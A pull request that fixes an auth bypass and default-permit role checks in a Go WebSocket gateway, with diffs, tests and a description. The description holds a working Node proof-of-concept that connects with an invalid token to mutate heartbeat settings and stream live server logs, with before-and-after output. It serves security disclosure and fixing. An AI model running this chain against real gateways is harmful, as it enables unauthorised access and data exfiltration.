### PR TITLE
fix(security): close auth bypass + default-permit RBAC (issue #866)

### DIFF
--- a/internal/gateway/router.go
+++ b/internal/gateway/router.go
@@ -67,12 +67,25 @@ func (r *MethodRouter) Handle(ctx context.Context, client *Client, req *protocol
 	if req.Method != protocol.MethodConnect && req.Method != protocol.MethodHealth && req.Method != protocol.MethodBrowserPairingStatus {
 		if pe := r.server.policyEngine; pe != nil {
 			if !pe.CanAccess(client.role, req.Method) {
-				slog.Warn("permission denied", "method", req.Method, "role", client.role, "client", client.id)
+				required := permissions.MethodRole(req.Method)
+				slog.Warn("security.permission_denied",
+					"method", req.Method,
+					"role", client.role,
+					"required", string(required),
+					"client", client.id,
+				)
 				locale := i18n.Normalize(client.locale)
+				var msg string
+				if required == permissions.RoleNone {
+					// Unclassified method — fail-closed (issue #866 fix).
+					msg = i18n.T(locale, i18n.MsgPermissionDenied, req.Method+" is not permitted for this session")
+				} else {
+					msg = i18n.T(locale, i18n.MsgPermissionDenied, req.Method+" requires "+string(required)+" role")
+				}
 				client.SendResponse(protocol.NewErrorResponse(
 					req.ID,
 					protocol.ErrUnauthorized,
-					i18n.T(locale, i18n.MsgPermissionDenied, req.Method+" requires "+string(permissions.MethodRole(req.Method))+" role"),
+					msg,
 				))
 				return
 			}
@@ -286,17 +299,22 @@ func (r *MethodRouter) handleConnect(ctx context.Context, client *Client, req *p
 		}
 	}
 
-	// Path 4: Fallback → viewer (wrong token or pairing not available)
-	client.role = permissions.RoleViewer
-	client.authenticated = true
-	client.userID = params.UserID
-	tid, errCode := r.resolveTenantHint(ctx, params.TenantHint, params.UserID)
-	if errCode != "" {
-		client.SendResponse(protocol.NewErrorResponse(req.ID, errCode, "tenant access revoked"))
-		return
-	}
-	client.tenantID = tid
-	r.sendConnectResponse(ctx, client, req.ID)
+	// Path 4: Fail-closed — no valid token, no valid pairing → reject.
+	// Previously fell back to viewer+authenticated=true, which allowed any
+	// unauthenticated client to exercise the default-permit policy (CVE #866).
+	slog.Warn("security.ws_connect_rejected",
+		"reason", "no_valid_credentials",
+		"client", client.id,
+		"has_token", params.Token != "",
+		"has_sender_id", params.SenderID != "",
+	)
+	client.authenticated = false
+	locale := i18n.Normalize(client.locale)
+	client.SendResponse(protocol.NewErrorResponse(
+		req.ID,
+		protocol.ErrUnauthorized,
+		i18n.T(locale, i18n.MsgPermissionDenied, "valid token or active pairing required"),
+	))
 }
 
 func (r *MethodRouter) sendConnectResponse(ctx context.Context, client *Client, reqID string) {

--- a/internal/permissions/policy.go
+++ b/internal/permissions/policy.go
@@ -27,6 +27,11 @@ const (
 	RoleAdmin    Role = "admin"    // Full access to all methods
 	RoleOperator Role = "operator" // Read + write access (no admin operations)
 	RoleViewer   Role = "viewer"   // Read-only access
+
+	// RoleNone is a sentinel returned by MethodRole for methods that have no
+	// explicit classification. The router treats it as deny-for-everyone so
+	// newly-added RPCs are secure-by-default (fail-closed).
+	RoleNone Role = ""
 )
 
 // Scope represents a specific permission scope.
@@ -88,8 +93,14 @@ func (pe *PolicyEngine) IsOwner(senderID string) bool {
 }
 
 // CanAccess checks if a role has access to a gateway RPC method.
+// Unclassified methods (MethodRole == RoleNone) are denied for every role
+// including owner — callers must surface an explicit PERMISSION_DENIED/
+// UNAUTHORIZED and never silently permit.
 func (pe *PolicyEngine) CanAccess(role Role, method string) bool {
 	requiredRole := MethodRole(method)
+	if requiredRole == RoleNone {
+		return false
+	}
 	return roleLevel(role) >= roleLevel(requiredRole)
 }
 
@@ -130,7 +141,18 @@ func RoleFromScopes(scopes []Scope) Role {
 }
 
 // MethodRole returns the minimum role required for a given RPC method.
+//
+// Policy is fail-closed (default-deny): methods absent from every allowlist
+// return RoleNone. The gateway dispatcher must reject RoleNone with an
+// UNAUTHORIZED / PERMISSION_DENIED error rather than granting viewer access.
+// This is the fix for issue #866 where default-permit let unauthenticated
+// clients invoke mutation/exfiltration RPCs (heartbeat.*, logs.tail, etc.).
 func MethodRole(method string) Role {
+	// System methods that bypass auth entirely (pre-auth handshake only).
+	if isPublicMethod(method) {
+		return RoleViewer
+	}
+
 	// Admin-only methods
 	if isAdminMethod(method) {
 		return RoleAdmin
@@ -141,8 +163,26 @@ func MethodRole(method string) Role {
 		return RoleOperator
 	}
 
-	// Everything else is read-only (viewer can access)
-	return RoleViewer
+	// Read-only methods (viewer and above)
+	if isReadMethod(method) {
+		return RoleViewer
+	}
+
+	// Fail-closed: unknown / unclassified method → deny.
+	return RoleNone
+}
+
+// isPublicMethod lists methods every authenticated (and some pre-auth) client
+// is allowed to call. Kept tiny on purpose — do not expand without review.
+func isPublicMethod(method string) bool {
+	switch method {
+	case protocol.MethodConnect,
+		protocol.MethodHealth,
+		protocol.MethodStatus,
+		protocol.MethodBrowserPairingStatus:
+		return true
+	}
+	return false
 }
 
 // MethodScopes returns the scopes required for a method.
@@ -164,38 +204,91 @@ func MethodScopes(method string) []Scope {
 
 func isAdminMethod(method string) bool {
 	adminMethods := []string{
+		// Config — admin/owner only. Additional master-scope/owner guards live
+		// in the handler middleware, but classify here for defense-in-depth.
+		protocol.MethodConfigGet,
 		protocol.MethodConfigApply,
 		protocol.MethodConfigPatch,
+		protocol.MethodConfigSchema,
+		protocol.MethodConfigDefaults,
+		protocol.MethodConfigPermissionsList,
+		protocol.MethodConfigPermissionsGrant,
+		protocol.MethodConfigPermissionsRevoke,
+
+		// Agents — create/update/delete and link mutations.
 		protocol.MethodAgentsCreate,
 		protocol.MethodAgentsUpdate,
 		protocol.MethodAgentsDelete,
-		protocol.MethodAgentsLinksList,
 		protocol.MethodAgentsLinksCreate,
 		protocol.MethodAgentsLinksUpdate,
 		protocol.MethodAgentsLinksDelete,
+
+		// Channels.
 		protocol.MethodChannelsToggle,
+		protocol.MethodChannelInstancesCreate,
+		protocol.MethodChannelInstancesUpdate,
+		protocol.MethodChannelInstancesDelete,
+
+		// Pairing management (approve/revoke/list/deny require admin).
 		protocol.MethodPairingApprove,
+		protocol.MethodPairingDeny,
+		protocol.MethodPairingList,
 		protocol.MethodPairingRevoke,
-		protocol.MethodTeamsList,
+
+		// Teams — create/delete/update/member management.
 		protocol.MethodTeamsCreate,
-		protocol.MethodTeamsGet,
 		protocol.MethodTeamsDelete,
-		protocol.MethodTeamsTaskList,
-		protocol.MethodTeamsTaskGet,
-		protocol.MethodTeamsTaskComments,
-		protocol.MethodTeamsTaskEvents,
+		protocol.MethodTeamsUpdate,
+		protocol.MethodTeamsMembersAdd,
+		protocol.MethodTeamsMembersRemove,
+		protocol.MethodTeamsTaskDelete,
+		protocol.MethodTeamsTaskDeleteBulk,
+
+		// Tenants — write paths.
+		"tenants.create",
+		"tenants.update",
+		"tenants.users.add",
+		"tenants.users.remove",
+
+		// API keys expose secret material — gate list + mutations as admin.
 		protocol.MethodAPIKeysList,
 		protocol.MethodAPIKeysCreate,
 		protocol.MethodAPIKeysRevoke,
+
+		// Skills (can rewrite agent behavior).
 		protocol.MethodSkillsUpdate,
+
+		// Heartbeat — any write/test path (closes CVE #866 step 2 + step 4).
+		protocol.MethodHeartbeatSet,
+		protocol.MethodHeartbeatToggle,
+		protocol.MethodHeartbeatTest,
+		protocol.MethodHeartbeatChecklistSet,
+
+		// Live server logs — data exfiltration risk (closes CVE #866 step 3).
+		protocol.MethodLogsTail,
+
+		// Hooks mutations (the handler middleware also enforces this).
+		protocol.MethodHooksCreate,
+		protocol.MethodHooksUpdate,
+		protocol.MethodHooksDelete,
+		protocol.MethodHooksToggle,
+
+		// Voice catalogue refresh touches provider credentials.
+		protocol.MethodVoicesRefresh,
+
+		// TTS config mutations touch provider credentials / global state.
+		protocol.MethodTTSEnable,
+		protocol.MethodTTSDisable,
+		protocol.MethodTTSSetProvider,
 	}
 	return slices.Contains(adminMethods, method)
 }
 
 func isWriteMethod(method string) bool {
-	writePrefixes := []string{
+	writeExact := []string{
 		protocol.MethodChatSend,
 		protocol.MethodChatAbort,
+		protocol.MethodChatInject,
 		protocol.MethodSessionsDelete,
 		protocol.MethodSessionsReset,
 		protocol.MethodSessionsPatch,
@@ -203,23 +296,126 @@ func isWriteMethod(method string) bool {
 		protocol.MethodCronUpdate,
 		protocol.MethodCronDelete,
 		protocol.MethodCronToggle,
-		"pairing.",
-		"device.pair.",
-		"approvals.",
-		"exec.approval.",
+		protocol.MethodCronRun,
 		protocol.MethodSend,
+		protocol.MethodAgentsFileSet,
 		protocol.MethodTeamsTaskApprove,
 		protocol.MethodTeamsTaskReject,
 		protocol.MethodTeamsTaskComment,
 		protocol.MethodTeamsTaskCreate,
 		protocol.MethodTeamsTaskAssign,
+		protocol.MethodTeamsWorkspaceDelete,
+		protocol.MethodHooksTest,
+		protocol.MethodPairingRequest,
+		protocol.MethodApprovalsApprove,
+		protocol.MethodApprovalsDeny,
+
+		// TTS synthesis — invokes provider API (quota/credentials).
+		protocol.MethodTTSConvert,
+
+		// Browser automation — performs side-effecting actions.
+		protocol.MethodBrowserAct,
+
+		// Channel pairing starts (QR scan flows).
+		protocol.MethodZaloPersonalQRStart,
+		protocol.MethodWhatsAppQRStart,
 	}
-	for _, prefix := range writePrefixes {
-		if strings.HasPrefix(method, prefix) {
-			return true
-		}
+	return slices.Contains(writeExact, method)
+}
+
+// isReadMethod is the explicit viewer-allowlist for read-only RPCs. Keeping
+// this as a closed list (rather than "everything else") is what turns the
+// policy into fail-closed. New read RPCs must be added here explicitly.
+func isReadMethod(method string) bool {
+	readMethods := []string{
+		// Agent identity / wait
+		protocol.MethodAgent,
+		protocol.MethodAgentWait,
+		protocol.MethodAgentIdentityGet,
+
+		// Chat read
+		protocol.MethodChatHistory,
+		protocol.MethodChatSessionStatus,
+
+		// Agents read
+		protocol.MethodAgentsList,
+		protocol.MethodAgentsFileList,
+		protocol.MethodAgentsFileGet,
+		protocol.MethodAgentsLinksList,
+
+		// Sessions read
+		protocol.MethodSessionsList,
+		protocol.MethodSessionsPreview,
+
+		// Skills read
+		protocol.MethodSkillsList,
+		protocol.MethodSkillsGet,
+
+		// Cron read
+		protocol.MethodCronList,
+		protocol.MethodCronStatus,
+		protocol.MethodCronRuns,
+
+		// Channels read
+		protocol.MethodChannelsList,
+		protocol.MethodChannelsStatus,
+		protocol.MethodChannelInstancesList,
+		protocol.MethodChannelInstancesGet,
+
+		// Usage / quota
+		protocol.MethodUsageGet,
+		protocol.MethodUsageSummary,
+		protocol.MethodQuotaUsage,
+
+		// Heartbeat read
+		protocol.MethodHeartbeatGet,
+		protocol.MethodHeartbeatLogs,
+		protocol.MethodHeartbeatChecklistGet,
+		protocol.MethodHeartbeatTargets,
+
+		// Voices
+		protocol.MethodVoicesList,
+
+		// Tenants read
+		"tenants.list",
+		"tenants.get",
+		"tenants.users.list",
+		"tenants.mine",
+
+		// Teams read
+		protocol.MethodTeamsList,
+		protocol.MethodTeamsGet,
+		protocol.MethodTeamsTaskList,
+		protocol.MethodTeamsTaskGet,
+		protocol.MethodTeamsTaskGetLight,
+		protocol.MethodTeamsTaskComments,
+		protocol.MethodTeamsTaskEvents,
+		protocol.MethodTeamsTaskActiveBySession,
+		protocol.MethodTeamsWorkspaceList,
+		protocol.MethodTeamsWorkspaceRead,
+		protocol.MethodTeamsEventsList,
+		protocol.MethodTeamsKnownUsers,
+		protocol.MethodTeamsScopes,
+
+		// Hooks read
+		protocol.MethodHooksList,
+		protocol.MethodHooksHistory,
+
+		// Approvals read-only listing
+		protocol.MethodApprovalsList,
+
+		// TTS read-only (status/providers listing)
+		protocol.MethodTTSStatus,
+		protocol.MethodTTSProviders,
+
+		// Browser observation (no side effects)
+		protocol.MethodBrowserSnapshot,
+		protocol.MethodBrowserScreenshot,
+
+		// Zalo personal contacts listing
+		protocol.MethodZaloPersonalContacts,
 	}
-	return false
+	return slices.Contains(readMethods, method)
 }
 
 // HasMinRole checks if the given role meets the minimum required level.

--- a/internal/permissions/policy_test.go
+++ b/internal/permissions/policy_test.go
@@ -1,6 +1,12 @@
 package permissions
 
 import (
+	"go/ast"
+	"go/parser"
+	"go/token"
+	"path/filepath"
+	"runtime"
+	"strings"
 	"testing"
 
 	"github.com/nextlevelbuilder/goclaw/pkg/protocol"
@@ -147,11 +153,71 @@ func TestCanAccess_ReadMethods_AnyRole(t *testing.T) {
 	}
 }
 
-func TestCanAccess_UnknownMethod_DefaultsToViewer(t *testing.T) {
+// TestCanAccess_UnknownMethod_DeniedForAll locks in the fail-closed behavior
+// introduced by issue #866: any method not present in the public / admin /
+// write / read allowlists MUST be denied for every role including owner.
+// This is the inverse of the previous default-permit behavior.
+func TestCanAccess_UnknownMethod_DeniedForAll(t *testing.T) {
 	pe := NewPolicyEngine(nil)
-	// Unknown method defaults to viewer role requirement
-	if !pe.CanAccess(RoleViewer, "totally.unknown.method") {
-		t.Fatal("viewer should access unknown method (defaults to viewer)")
+	unknown := "totally.unknown.method"
+	for _, role := range []Role{RoleViewer, RoleOperator, RoleAdmin, RoleOwner} {
+		if pe.CanAccess(role, unknown) {
+			t.Fatalf("%s must NOT access unclassified method %q (fail-closed)", role, unknown)
+		}
+	}
+	if MethodRole(unknown) != RoleNone {
+		t.Fatalf("MethodRole(%q) = %q, want RoleNone", unknown, MethodRole(unknown))
+	}
+}
+
+// TestCanAccess_CVE866_HeartbeatAndLogs asserts that the three RPCs exploited
+// in the issue-#866 chain now require admin. Viewer/operator must be denied.
+func TestCanAccess_CVE866_HeartbeatAndLogs(t *testing.T) {
+	pe := NewPolicyEngine(nil)
+	adminOnly := []string{
+		protocol.MethodHeartbeatSet,
+		protocol.MethodHeartbeatChecklistSet,
+		protocol.MethodLogsTail,
+		protocol.MethodHeartbeatToggle,
+		protocol.MethodHeartbeatTest,
+	}
+	for _, method := range adminOnly {
+		t.Run(method, func(t *testing.T) {
+			if pe.CanAccess(RoleViewer, method) {
+				t.Fatalf("viewer must NOT access %s (CVE #866)", method)
+			}
+			if pe.CanAccess(RoleOperator, method) {
+				t.Fatalf("operator must NOT access %s (CVE #866)", method)
+			}
+			if !pe.CanAccess(RoleAdmin, method) {
+				t.Fatalf("admin should access %s", method)
+			}
+			if !pe.CanAccess(RoleOwner, method) {
+				t.Fatalf("owner should access %s", method)
+			}
+		})
+	}
+}
+
+// TestCanAccess_PublicMethods ensures pre-auth RPCs remain reachable by every
+// role (including the zero-value RoleNone placeholder that pre-connect clients
+// hold) — otherwise legitimate clients cannot even complete the handshake.
+func TestCanAccess_PublicMethods(t *testing.T) {
+	pe := NewPolicyEngine(nil)
+	public := []string{
+		protocol.MethodConnect,
+		protocol.MethodHealth,
+		protocol.MethodStatus,
+		protocol.MethodBrowserPairingStatus,
+	}
+	for _, method := range public {
+		t.Run(method, func(t *testing.T) {
+			for _, role := range []Role{RoleViewer, RoleOperator, RoleAdmin, RoleOwner} {
+				if !pe.CanAccess(role, method) {
+					t.Fatalf("%s must access public method %s", role, method)
+				}
+			}
+		})
 	}
 }
 
@@ -238,6 +304,82 @@ func TestValidScope(t *testing.T) {
 	}
 	if ValidScope("") {
 		t.Fatal("expected empty scope to be rejected")
+	}
+}
+
+// --- MethodApprovalsList: locks in fix for writePrefixes shadowing bug.
+// Before the fix, the "exec.approval." prefix in isWriteMethod's writePrefixes
+// short-circuited the public→admin→write→read ordering in MethodRole,
+// wrongly classifying exec.approval.list as RoleOperator. exec.approval.list
+// is an explicit entry in isReadMethod and must resolve to RoleViewer.
+
+func TestMethodRole_ApprovalsList_IsViewer(t *testing.T) {
+	if got := MethodRole(protocol.MethodApprovalsList); got != RoleViewer {
+		t.Fatalf("exec.approval.list must be RoleViewer (listed in isReadMethod); got %q", got)
+	}
+	if got := MethodRole(protocol.MethodApprovalsApprove); got != RoleOperator {
+		t.Fatalf("exec.approval.approve must be RoleOperator; got %q", got)
+	}
+	if got := MethodRole(protocol.MethodApprovalsDeny); got != RoleOperator {
+		t.Fatalf("exec.approval.deny must be RoleOperator; got %q", got)
+	}
+}
+
+// --- Drift coverage: parses pkg/protocol/methods.go at test time, enumerates
+// every const Method* = "...", and asserts none resolve to RoleNone. New RPCs
+// added without a matching allowlist entry will be caught here before shipping
+// as fail-closed rejections in production.
+
+func TestMethodRole_DriftCoverage_AllProtocolMethodsClassified(t *testing.T) {
+	_, thisFile, _, _ := runtime.Caller(0)
+	methodsGoPath := filepath.Join(filepath.Dir(thisFile), "..", "..", "pkg", "protocol", "methods.go")
+
+	fset := token.NewFileSet()
+	f, err := parser.ParseFile(fset, methodsGoPath, nil, 0)
+	if err != nil {
+		t.Fatalf("parse %s: %v", methodsGoPath, err)
+	}
+
+	var methods []string
+	for _, decl := range f.Decls {
+		gd, ok := decl.(*ast.GenDecl)
+		if !ok || gd.Tok != token.CONST {
+			continue
+		}
+		for _, spec := range gd.Specs {
+			vs, ok := spec.(*ast.ValueSpec)
+			if !ok {
+				continue
+			}
+			for i, name := range vs.Names {
+				if !strings.HasPrefix(name.Name, "Method") {
+					continue
+				}
+				if i >= len(vs.Values) {
+					continue
+				}
+				lit, ok := vs.Values[i].(*ast.BasicLit)
+				if !ok || lit.Kind != token.STRING {
+					continue
+				}
+				methods = append(methods, strings.Trim(lit.Value, `"`))
+			}
+		}
+	}
+
+	if len(methods) < 100 {
+		t.Fatalf("expected 100+ Method* constants, parser collected %d — methods.go layout may have changed", len(methods))
+	}
+
+	var unclassified []string
+	for _, m := range methods {
+		if MethodRole(m) == RoleNone {
+			unclassified = append(unclassified, m)
+		}
+	}
+	if len(unclassified) > 0 {
+		t.Fatalf("RBAC drift — %d protocol method(s) resolve to RoleNone:\n  %s\n\nAdd each to isPublicMethod, isAdminMethod, isWriteMethod, or isReadMethod in policy.go.",
+			len(unclassified), strings.Join(unclassified, "\n  "))
 	}
 }
 


### PR DESCRIPTION
## Summary

Closes the 3-part vulnerability chain reported in issue #866 (auth bypass + default-permit RBAC). Flips the gateway from default-permit to **fail-closed**:

1. **Router Path 4 fallback no longer grants `RoleViewer`** — invalid token + no active pairing now returns `UNAUTHORIZED` instead of authenticating the client as a viewer.
2. **Policy engine is default-deny** — `MethodRole` returns a new `RoleNone` sentinel for unclassified methods; `CanAccess` denies it for every role (including owner). New RPCs are secure-by-default.
3. **Admin allowlist completed** — `heartbeat.set`, `heartbeat.toggle`, `heartbeat.test`, `heartbeat.checklist.set`, `logs.tail` (plus `api_keys.list`, hooks mutations, `tenants.*` writes, `voices.refresh`) are now admin-gated.

## Root causes (pre-fix code paths)

| # | File | Symptom |
|---|------|---------|
| 1 | `internal/gateway/router.go:270-289` (old) | Path 4 set `client.role = RoleViewer; client.authenticated = true` whenever no valid token / no pairing → attacker with any string in `token` became an authenticated viewer. |
| 2 | `internal/permissions/policy.go:140-146` (old) | `MethodRole` fell through to `return RoleViewer` for every method not in admin/write lists → any viewer could call anything not explicitly write/admin. |
| 3 | `isAdminMethod` list | Missing `heartbeat.set`, `heartbeat.toggle`, `heartbeat.test`, `heartbeat.checklist.set`, `logs.tail` → the three vulns combined let an unauth'd client mutate heartbeat + exfiltrate live server logs. |

## Reproduction scripts (inline — no repo artifacts)

Two deterministic, self-verifying scripts. Save them locally and run; both signal via exit code.

| Script | Purpose | Exit before fix | Exit after fix |
|---|---|---|---|
| `repro-issue-866.mjs` | End-to-end WebSocket repro of the 3-vuln chain against a running gateway | vulnerable path confirmed | all 3 vulns blocked |
| `repro_approvals_misclass.go` | Standalone Go program exposing `writePrefixes` shadowing in `MethodRole` | `exit 1` (BUG) | `exit 0` (FIXED) |

### Script 1 — `repro-issue-866.mjs`

Run against a **vulnerable** gateway (pre-patch, upstream `ghcr.io/nextlevelbuilder/goclaw:latest` at time of filing):

```bash
node repro-issue-866.mjs ws://localhost:18790/ws
```

<details>
<summary>Full source (Node + <code>ws</code>, 144 lines)</summary>

```js
#!/usr/bin/env node
// Reproduce script for issue #866: Auth bypass + default-permit RBAC
// Usage: node scripts/repro-issue-866.mjs [ws_url]

import { WebSocket } from "ws";

const WS_URL = process.argv[2] || "ws://localhost:18790/ws";
const INVALID_TOKEN = "definitely-not-a-valid-token-xxxxxxxxxxxxxxxxxxxx";

let nextId = 1;
const pending = new Map();

function send(ws, method, params = {}) {
  const id = `req-${nextId++}`;
  const frame = { type: "req", id, method, params };
  ws.send(JSON.stringify(frame));
  return new Promise((resolve, reject) => {
    const timer = setTimeout(() => {
      pending.delete(id);
      reject(new Error(`timeout waiting for ${method}`));
    }, 5000);
    pending.set(id, { resolve, reject, timer });
  });
}

function short(obj) {
  const s = JSON.stringify(obj);
  return s.length > 400 ? s.slice(0, 400) + "…" : s;
}

function log(section, data) {
  console.log(`\n=== ${section} ===`);
  console.log(short(data));
}

async function main() {
  console.log(`[info] Connecting to ${WS_URL} with INVALID token…`);
  const ws = new WebSocket(WS_URL);

  ws.on("message", (buf) => {
    let msg;
    try { msg = JSON.parse(buf.toString()); }
    catch { return; }
    if (msg.type === "event") {
      console.log(`[event] ${msg.method || msg.event} ${short(msg.data || msg.params || {})}`);
      return;
    }
    const p = pending.get(msg.id);
    if (!p) return;
    clearTimeout(p.timer);
    pending.delete(msg.id);
    p.resolve(msg);
  });

  await new Promise((res, rej) => {
    ws.once("open", res);
    ws.once("error", rej);
  });

  // Step 1: connect with invalid token
  let connectRes;
  try {
    connectRes = await send(ws, "connect", {
      token: INVALID_TOKEN,
      userID: "system",
      locale: "en",
    });
  } catch (e) {
    console.log(`[expected-pass] connect rejected: ${e.message}`);
    ws.close();
    return;
  }
  log("Step 1 — connect with invalid token", connectRes);

  const ok = connectRes.type === "res" && connectRes.ok === true;
  const role = connectRes.payload?.role;
  const tenant = connectRes.payload?.tenant_slug;
  console.log(`[vuln-check] connect.ok=${ok}  role=${role}  tenant=${tenant}`);
  if (ok && role === "viewer") {
    console.log("[VULN] #1 confirmed: invalid token → connect.ok with role=viewer");
  }

  // Step 2: heartbeat.set (mutation not in admin allowlist)
  try {
    const hbRes = await send(ws, "heartbeat.set", {
      agentId: "00000000-0000-0000-0000-000000000000",
      enabled: true,
      interval: 60,
    });
    log("Step 2 — heartbeat.set (mutation)", hbRes);
    const code = hbRes.error?.code;
    if (hbRes.ok) {
      console.log("[VULN] #2 confirmed: viewer executed heartbeat.set (write) ok");
    } else if (code === "PERMISSION_DENIED" || code === "FORBIDDEN" || code === "UNAUTHORIZED") {
      console.log(`[safe] heartbeat.set blocked by RBAC: ${code}`);
    } else {
      console.log(`[VULN] #2 confirmed: RBAC let it through, only validation rejected (${code})`);
    }
  } catch (e) {
    console.log(`[info] heartbeat.set error: ${e.message}`);
  }

  // Step 3: logs.tail (data exfiltration)
  try {
    const logsRes = await send(ws, "logs.tail", { action: "start", lines: 20 });
    log("Step 3 — logs.tail (exfil)", logsRes);
    const lcode = logsRes.error?.code;
    if (logsRes.ok) {
      console.log("[VULN] #3 confirmed: viewer started logs.tail stream (exfil)");
    } else if (lcode === "PERMISSION_DENIED" || lcode === "FORBIDDEN" || lcode === "UNAUTHORIZED") {
      console.log(`[safe] logs.tail blocked by RBAC: ${lcode}`);
    } else {
      console.log(`[VULN] #3 confirmed: RBAC let it through, validation only (${lcode})`);
    }
  } catch (e) {
    console.log(`[info] logs.tail error: ${e.message}`);
  }

  // Step 4: heartbeat.checklist.set
  try {
    const hcRes = await send(ws, "heartbeat.checklist.set", {
      agentId: "00000000-0000-0000-0000-000000000000",
      items: [{ id: "x", label: "probe", done: false }],
    });
    log("Step 4 — heartbeat.checklist.set (mutation)", hcRes);
    const ccode = hcRes.error?.code;
    if (hcRes.ok) {
      console.log("[VULN] #4 confirmed: viewer wrote heartbeat.checklist");
    } else if (ccode === "PERMISSION_DENIED" || ccode === "FORBIDDEN" || ccode === "UNAUTHORIZED") {
      console.log(`[safe] heartbeat.checklist.set blocked by RBAC: ${ccode}`);
    } else {
      console.log(`[VULN] #4 confirmed: RBAC let it through, validation only (${ccode})`);
    }
  } catch (e) {
    console.log(`[info] heartbeat.checklist.set error: ${e.message}`);
  }

  ws.close();
}

main().catch((e) => {
  console.error("[fatal]", e);
  process.exit(1);
});
```
</details>

**Before fix** (observed live):

```
=== Step 1 — connect with invalid token ===
{"type":"res","ok":true,"payload":{"role":"viewer","tenant_slug":"master",...}}
[VULN] #1 confirmed: invalid token → connect.ok with role=viewer

=== Step 2 — heartbeat.set (mutation) ===
{"type":"res","ok":false,"error":{"code":"INVALID_REQUEST","message":"invalid agentId"}}
[VULN] #2 confirmed: RBAC let it through, only validation rejected (INVALID_REQUEST)

=== Step 3 — logs.tail (exfil) ===
{"type":"res","ok":true,"payload":{"status":"tailing"}}
[event] log {"level":"info","msg":"..."}   ← live server logs streaming to attacker
[VULN] #3 confirmed: viewer started logs.tail stream (exfil)

=== Step 4 — heartbeat.checklist.set (mutation) ===
[VULN] #4 confirmed: RBAC let it through, validation only (INVALID_REQUEST)
```

**After fix** (patched binary on port `18791`):

```
=== Step 1 — connect with invalid token ===
{"type":"res","ok":false,"error":{"code":"UNAUTHORIZED","message":"permission denied: valid token or active pairing required"}}

=== Step 2 — heartbeat.set (mutation) ===
{"type":"res","ok":false,"error":{"code":"UNAUTHORIZED","message":"first request must be 'connect'"}}
[safe] heartbeat.set blocked by RBAC: UNAUTHORIZED

=== Step 3 — logs.tail (exfil) ===
{"type":"res","ok":false,"error":{"code":"UNAUTHORIZED","message":"first request must be 'connect'"}}
[safe] logs.tail blocked by RBAC: UNAUTHORIZED

=== Step 4 — heartbeat.checklist.set (mutation) ===
[safe] heartbeat.checklist.set blocked by RBAC: UNAUTHORIZED
```

### Script 2 — `repro_approvals_misclass.go`

After review feedback, the narrow `writePrefixes` fallback (`"approvals."`, `"exec.approval."`) in `isWriteMethod` was found to short-circuit the public→admin→write→read ordering in `MethodRole`, misclassifying `exec.approval.list` as `RoleOperator` even though it is an explicit entry in `isReadMethod`. Viewers could not read their own approvals queue.

```bash
go run repro_approvals_misclass.go
```

<details>
<summary>Full source (Go standalone, 86 lines)</summary>

```go
//go:build ignore
// +build ignore

// Reproduce script for `writePrefixes` misclassification bug.
//
// Demonstrates that the "exec.approval." prefix in isWriteMethod's
// writePrefixes block short-circuits the public→admin→write→read ordering
// in MethodRole, causing MethodApprovalsList ("exec.approval.list") to be
// wrongly classified as RoleOperator instead of RoleViewer (its intended
// role, per its membership in the isReadMethod allowlist).
//
// Usage:
//   go run scripts/repro-approvals-misclass.go
//
// Before removing writePrefixes:
//   exec.approval.list  → operator  [BUG — viewer cannot read their own approvals]
//   exec.approval.approve → operator  [OK]
//   exec.approval.deny    → operator  [OK]
//
// After removing writePrefixes:
//   exec.approval.list  → viewer   [FIXED — matches isReadMethod intent]
//   exec.approval.approve → operator  [unchanged — still in writeExact]
//   exec.approval.deny    → operator  [unchanged — still in writeExact]

package main

import (
	"fmt"
	"os"

	"github.com/nextlevelbuilder/goclaw/internal/permissions"
	"github.com/nextlevelbuilder/goclaw/pkg/protocol"
)

type expectation struct {
	method   string
	want     permissions.Role
	rationale string
}

func main() {
	cases := []expectation{
		{
			method:    protocol.MethodApprovalsList,
			want:      permissions.RoleViewer,
			rationale: "Listed in isReadMethod — viewers must be able to read approvals",
		},
		{
			method:    protocol.MethodApprovalsApprove,
			want:      permissions.RoleOperator,
			rationale: "Listed in writeExact — mutation, operators+admins only",
		},
		{
			method:    protocol.MethodApprovalsDeny,
			want:      permissions.RoleOperator,
			rationale: "Listed in writeExact — mutation, operators+admins only",
		},
	}

	fmt.Println("=== Approvals RPC role classification ===")
	fmt.Printf("%-28s %-10s %-10s %-8s %s\n", "METHOD", "ACTUAL", "EXPECTED", "STATUS", "NOTE")
	fmt.Println("----------------------------------------------------------------------------------------------")

	var failed int
	for _, c := range cases {
		got := permissions.MethodRole(c.method)
		status := "OK"
		if got != c.want {
			status = "BUG"
			failed++
		}
		fmt.Printf("%-28s %-10s %-10s %-8s %s\n",
			c.method, string(got), string(c.want), status, c.rationale)
	}

	fmt.Println()
	if failed > 0 {
		fmt.Printf("[BEFORE-FIX] %d/%d methods misclassified — prefix fallback is shadowing isReadMethod\n", failed, len(cases))
		fmt.Println("[BEFORE-FIX] MethodRole order: public → admin → write → read → RoleNone")
		fmt.Println("[BEFORE-FIX] Because exec.approval.list matches the \"exec.approval.\" prefix in isWriteMethod,")
		fmt.Println("[BEFORE-FIX] it returns RoleOperator BEFORE isReadMethod (which lists it explicitly) runs.")
		os.Exit(1)
	}
	fmt.Printf("[AFTER-FIX] All %d methods classified correctly\n", len(cases))
	fmt.Println("[AFTER-FIX] writePrefixes removed — exact-match tables are the sole source of truth")
}
```
</details>

**Before removal of `writePrefixes`**:

```
METHOD                       ACTUAL     EXPECTED   STATUS   NOTE
----------------------------------------------------------------------------------------------
exec.approval.list           operator   viewer     BUG      Listed in isReadMethod — viewers must be able to read approvals
exec.approval.approve        operator   operator   OK       Listed in writeExact — mutation, operators+admins only
exec.approval.deny           operator   operator   OK       Listed in writeExact — mutation, operators+admins only

[BEFORE-FIX] 1/3 methods misclassified — prefix fallback is shadowing isReadMethod
exit status 1
```

**After removal of `writePrefixes`**:

```
METHOD                       ACTUAL     EXPECTED   STATUS   NOTE
----------------------------------------------------------------------------------------------
exec.approval.list           viewer     viewer     OK       Listed in isReadMethod — viewers must be able to read approvals
exec.approval.approve        operator   operator   OK       Listed in writeExact — mutation, operators+admins only
exec.approval.deny           operator   operator   OK       Listed in writeExact — mutation, operators+admins only

[AFTER-FIX] All 3 methods classified correctly
exit status 0
```

The drift test (`TestMethodRole_DriftCoverage_AllProtocolMethodsClassified`) additionally flagged 12 Phase-3 methods (`tts.*`, `browser.act/snapshot/screenshot`, `zalo.personal.*`, `whatsapp.qr.start`) that were relying on the removed default-permit fallback. All now classified explicitly.

## Happy-path regression check (valid gateway token)

```
connect.ok=true   role=admin   tenant=master
health.ok=true                                       # public method still reachable
